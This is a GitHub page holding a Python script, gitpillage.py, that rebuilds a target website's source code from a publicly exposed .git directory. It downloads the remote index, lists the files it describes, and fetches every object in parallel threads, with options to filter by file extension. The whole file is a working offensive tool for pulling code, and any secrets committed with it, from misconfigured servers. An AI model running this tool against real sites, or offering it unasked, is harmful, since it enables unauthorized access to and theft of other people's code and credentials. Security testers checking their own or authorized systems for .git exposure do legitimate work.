Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 241 lines (191 sloc) 6.33 KB
#!/usr/bin/python3.5
# inspired by https://github.com/koto/gitpillage/blob/master/gitpillage.sh
# example: python3.5 gitpillage.py -u https://www.example.com/.git -t 10
# I don't believe in licenses.
# You can do whatever you want with this program.
#
### functions
#
def downloadFile( url ):
    """Fetch `url` with a 3 second timeout.

    Returns whatever `requests.get` returns when the call succeeds. When the
    call raises, the error is printed in red on stdout and False is returned
    instead, so callers have to tell the two apart themselves.
    """
    try:
        return requests.get( url, timeout=3 )
    except Exception as err:
        message = "%s[-] error occurred: %s%s\n" % (fg('red'),err,attr(0))
        sys.stdout.write( message )
    return False
def downloadOject( t_extension, t_exclude, file ):
    """Download one git object and check the matching file out locally.

    Parameters:
        t_extension: extensions to keep; ignored when empty.
        t_exclude: extensions to skip; ignored when empty. When both lists are
            non-empty the exclude list is evaluated last and decides alone.
        file: one "object_id:path" entry of the remote index.

    Returns:
        False when the entry is empty, malformed, filtered out, or when the
        download, the save or the checkout fails; None after a successful
        checkout.

    Reads the module-level `git_url` and `output_dir`, and updates the
    counters stored in the module-level `t_multiproc` dict.
    """
    sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    t_multiproc['n_current'] = t_multiproc['n_current'] + 1

    file = file.strip()
    if not file:
        return False

    # split on the first ':' only, so a path that itself contains ':' is kept whole
    object_id, separator, relative_path = file.partition( ':' )
    if not separator or not object_id or not relative_path:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[*] skip malformed entry: %s%s\n" % (fg('dark_gray'),file,attr(0)) )
        return False

    ext = relative_path.split('.')[-1]

    # with no filter at all every file is downloaded
    go = True
    if t_extension:
        go = ext in t_extension
    if t_exclude:
        go = ext not in t_exclude

    if not go:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[*] skip extension: %s%s\n" % (fg('dark_gray'),relative_path,attr(0)) )
        return False

    u = git_url + '/objects/' + object_id[0:2] + '/' + object_id[2:]
    r = downloadFile( u )

    # downloadFile returns False (not a response) when the request itself failed
    if isinstance( r, bool ):
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[-] %s%s\n" % (fg('dark_gray'),u,attr(0)) )
        return False

    if r.status_code != 200:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[-] %s (%d)%s\n" % (fg('dark_gray'),u,r.status_code,attr(0)) )
        return False

    # saveObject prints its own error message and returns False on failure
    if not saveObject( output_dir, object_id, r.content ):
        return False

    real_filename = output_dir + '/' + relative_path

    try:
        # The path comes from the remote index, i.e. it is untrusted: pass it as
        # a single argument (no shell) and after '--' so it can never be read
        # as a command or as an option.
        # NOTE(review): several workers run git in the same repository at once;
        # confirm that concurrent checkouts do not fight over the index lock.
        subprocess.check_output( ['git','checkout','--',relative_path], cwd=output_dir, stderr=subprocess.STDOUT )
    except (subprocess.CalledProcessError, OSError) as e:
        if t_multiproc['verbose']:
            sys.stdout.write( "[-] %s (%d) %s-> %s%s\n" % (u,r.status_code,fg('yellow'),e,attr(0)) )
        return False

    t_multiproc['n_success'] = t_multiproc['n_success'] + 1
    sys.stdout.write( "[+] %s (%d) %s-> %s (%d)%s\n" % (u,r.status_code,fg('cyan'),real_filename,len(r.content),attr(0)) )
def saveObject( output_dir, object_id, content ):
    """Write a downloaded git object into the local repository.

    The object is stored at
    <output_dir>/.git/objects/<first 2 chars of object_id>/<remaining chars>.

    Parameters:
        output_dir: root directory of the local repository.
        object_id: object id as a string; the first two characters name the
            sub-directory, the rest names the file.
        content: bytes written to the file as-is.

    Returns:
        The path of the written file, or False when the directory or the file
        could not be written (the error is printed on stdout).
    """
    dirname = output_dir + '/.git/objects/'+ object_id[0:2]
    filename = dirname + '/' + object_id[2:]

    try:
        # exist_ok avoids the check-then-create race: this function is called
        # from several pool threads that often share the same two-char prefix
        os.makedirs( dirname, exist_ok=True )
        # the with-block closes the file even when write() fails
        with open( filename, 'wb' ) as fp:
            fp.write( content )
    except OSError as e:
        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
        return False

    return filename
#
###
#
import os
import sys
import argparse
import requests
import subprocess
from functools import partial
from urllib.parse import urlparse
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
#
### variables
#
# defaults, overridden by the command line below
max_threads = 5
t_extension = []
t_exclude = ['png','gif','jpg','jpeg','ico','svg','eot','otf','ttf','woff','woff2','css','sass','less','po','mo','mp3','mp4','mpeg','avi']

parser = argparse.ArgumentParser()
parser.add_argument( "-u","--url",help="url of the .git, example https://www.target.com/.git" )
# type=int lets argparse report a non-numeric value instead of a traceback
parser.add_argument( "-t","--threads",type=int,help="threads, default: 5" )
parser.add_argument( "-e","--extension",help="extensions to download separated by comma, overwrite --exclude, default: all but default exclude" )
parser.add_argument( "-x","--exclude",help="extensions to exclude separated by comma, default: "+','.join(t_exclude) )
parser.add_argument( "-v","--verbose",help="verbose mode, default: off", action="store_true" )
args = parser.parse_args()

if args.url:
    url = args.url
else:
    parser.error( 'url missing' )

if args.threads is not None:
    # the thread pool cannot be created with less than one worker
    if args.threads < 1:
        parser.error( 'threads must be a positive integer' )
    max_threads = args.threads

# --exclude replaces the default exclude list ...
if args.exclude:
    t_extension = []
    t_exclude = args.exclude.split(',')

# ... and --extension, when given, takes over and disables any exclude list
if args.extension:
    t_extension = args.extension.split(',')
    t_exclude = []

if not url.startswith( 'http' ):
    url = 'https://'+url

verbose = args.verbose

# git_url is used as given: '/index' and '/objects/..' are appended to it later
git_url = url
t_url_parse = urlparse( url )
# everything is written below ./<host of the target url>
output_dir = os.getcwd() + '/' + t_url_parse.netloc
#
###
#
#
### init
#
# create the output directory and turn it into an empty git repository;
# any failure here is fatal and ends the script with a non-zero status
if not os.path.isdir(output_dir):
    try:
        os.makedirs( output_dir )
    except OSError as e:
        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
        sys.exit( 1 )

sys.stdout.write( "%s[+] output directory: %s%s\n" % (fg('green'),output_dir,attr(0)) )

try:
    # argument list + cwd instead of a 'cd ...; git init' shell string, so a
    # directory name with spaces or shell metacharacters cannot break the call
    output = subprocess.check_output( ['git','init'], cwd=output_dir, stderr=subprocess.STDOUT ).decode('utf-8')
    sys.stdout.write( "[+] %s\n" % output.strip() )
except Exception as e:
    sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    sys.exit( 1 )
#
###
#
#
### create local repository
#
# download the remote index, drop it into the local repository and let git
# list the files it describes
u = git_url + '/index'
r = downloadFile( u )
if not r:
    sys.stdout.write( "%s[-] cannot find index file: %s%s\n" % (fg('red'),u,attr(0)) )
    sys.exit( 1 )

sys.stdout.write( "%s[+] index file found: %s%s\n" % (fg('green'),u,attr(0)) )

try:
    with open( output_dir+'/.git/index', 'wb' ) as fp:
        fp.write( r.content )
except OSError as e:
    sys.stdout.write( "%s[-] error occurred, cannot write index file%s\n" % (fg('red'),attr(0)) )
    sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    sys.exit( 1 )

try:
    # -z: entries are NUL separated and paths are printed verbatim, each entry
    # being "<mode> <object> <stage>\t<path>". Parsing this here instead of
    # piping through awk keeps paths that contain spaces intact and makes a
    # git failure visible (in a shell pipeline only awk's status is reported).
    output = subprocess.check_output( ['git','ls-files','--stage','-z'], cwd=output_dir, stderr=subprocess.PIPE ).decode('utf-8')
    t_ls_files = []
    for entry in output.split( '\0' ):
        meta, tab, path = entry.partition( '\t' )
        fields = meta.split( ' ' )
        if not tab or not path or len(fields) != 3:
            continue
        # "object_id:path", the format downloadOject expects
        t_ls_files.append( fields[1] + ':' + path )
except Exception as e:
    sys.stdout.write( "%s[-] error occurred, cannot list files from index%s\n" % (fg('red'),attr(0)) )
    sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    # git explains the failure on stderr, show it when it was captured
    git_message = getattr( e, 'stderr', None )
    if git_message:
        sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),git_message.decode('utf-8','replace').strip(),attr(0)) )
    sys.exit( 1 )
#
###
#
#
### main loop
#
# state shared with the downloadOject workers: progress counters + verbosity
t_multiproc = dict(
    n_current=0,
    n_total=len(t_ls_files),
    n_success=0,
    verbose=verbose,
)

# every worker call gets the two filter lists plus one entry of t_ls_files
worker = partial( downloadOject, t_extension, t_exclude )
pool = Pool( max_threads )
pool.map( worker, t_ls_files )
pool.close()
pool.join()
#
###
#
summary = "%s[+] %d files successfully downloaded%s\n" % (fg('green'),t_multiproc['n_success'],attr(0))
sys.stdout.write( summary )
You can’t perform that action at this time.